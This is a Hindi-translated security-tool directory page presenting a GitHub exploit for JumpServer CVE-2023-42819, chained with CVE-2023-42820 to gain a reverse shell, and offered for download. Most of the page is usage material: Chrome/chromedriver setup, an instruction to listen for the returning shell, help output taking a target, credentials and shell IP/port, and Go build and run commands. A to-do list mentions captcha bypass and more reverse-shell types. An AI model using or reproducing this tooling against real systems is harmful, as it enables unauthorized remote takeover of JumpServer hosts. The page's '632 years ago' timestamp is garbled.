Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-42819 — CVE-2023-42819 | Kitploit
उपकरण/GitHubGitHub/c1ph3rx13/cve-2023-42819
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

रिपॉजिटरी देखें
632 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-42819

CVE-2023-42819

भेद्यता विवरण

JumpServer मनमाना फ़ाइल लेखन भेद्यता

CVE-2023-42819 + CVE-2023-42820 = GetShell

उपयोग

  1. स्क्रिप्ट और आवश्यक फ़ाइलों को एक ही निर्देशिका में रखें

  2. सुनिश्चित करें कि Google Chrome स्थापित है, और Google Chrome का संस्करण प्राप्त करें

root@kitploit:~
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. Google Chrome के संबंधित संस्करण और सिस्टम के अनुसार chromedriver डाउनलोड करें, फिर इसे webdriver में रखें

    नवीनतम संस्करण: https://googlechromelabs.github.io/chrome-for-testing/

    पुराने संस्करण: https://chromedriver.chromium.org/downloads/version-selection

    बहुत सारी आवश्यकताएँ : (

  2. संबंधित IP और पोर्ट सुनें, शेल के वापस आने की प्रतीक्षा करें

Python संस्करण

root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: कोड केवल शिक्षा के लिए है, कृपया इसका अन्य उपयोग न करें

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 by C1ph3rX13.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url
  -u USERNAME, --username USERNAME
                        account username
  -p PASSWORD, --password PASSWORD
                        account password
  --ip IP               shell ip
  --port PORT           shell port
  --proxy PROXY         proxy to http://ip:port

image-1

image-1

Go संस्करण

निर्माण

root@kitploit:~
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

चलाना

root@kitploit:~
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: कोड केवल शिक्षा के लिए है, कृपया इसका अन्य उपयोग न करें                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        Shell IP
  -p string
        Account Password
  -port string
        Shell Port
  -proxy string
        Proxy Url
  -t string
        Target Url
  -u string
        Account Username

image-1

करने के लिए कार्य

  • क्रॉस-ओरिजिन समस्या का समाधान पर्याप्त सुरुचिपूर्ण नहीं है
  • httpx का उपयोग करके पुनर्लेखन
  • EXP फ़ंक्शन जोड़ना
  • go-resty का उपयोग करके पुनर्लेखन
  • लॉगिन में गलत पासवर्ड डालने पर कैप्चा बाईपास करना
  • रिवर्स शेल के प्रकार बढ़ाना
  • हेडलेस मोड का उपयोग करके Linux के साथ संगत
  • http, https, socks प्रॉक्सी जोड़ना
  • CVE-2023-42819 + CVE-2023-42820 एक क्लिक में GetShell
  • इतने सारे झंडे लगा दिए, शायद पूरा नहीं हो पाएगा : (

अनुरक्षण

  • 2023-10-18 वेबसाइट स्वचालित पहचान बाईपास जोड़ा गया - Python संस्करण
  • 2023-10-18 क्लाइंट फ़ंक्शन पुनर्गठन
  • 2023-10-18 रन लॉजिक सरलीकरण
  • 2023-10-18 Linux परीक्षण OK - Go संस्करण

अस्वीकरण

  1. यह उपकरण केवल उन पैठ परीक्षण सुरक्षा कर्मियों और नियमित नेटवर्क संचालन कर्मियों के लिए है जिनके पास वैध प्राधिकरण है। उपयोगकर्ता पर्याप्त वैध प्राधिकरण प्राप्त करने और गैर-वाणिज्यिक उपयोग की शर्तों पर इस सॉफ़्टवेयर को डाउनलोड, कॉपी, प्रसारित या उपयोग कर सकते हैं।
  2. इस उपकरण का उपयोग करते समय, आपको यह सुनिश्चित करना होगा कि आपके सभी कार्य स्थानीय कानूनों और विनियमों का अनुपालन करते हैं, और इस सॉफ़्टवेयर का उपयोग पीपुल्स रिपब्लिक ऑफ़ चाइना के संबंधित कानूनों के विरुद्ध गतिविधियों के लिए न करें। इस उपकरण के सभी लेखक और योगदानकर्ता उपयोगकर्ता द्वारा बिना प्राधिकरण के इस उपकरण का उपयोग करके किसी भी अवैध गतिविधि के लिए कोई जिम्मेदारी नहीं लेते हैं।
टूल डाउनलोड करें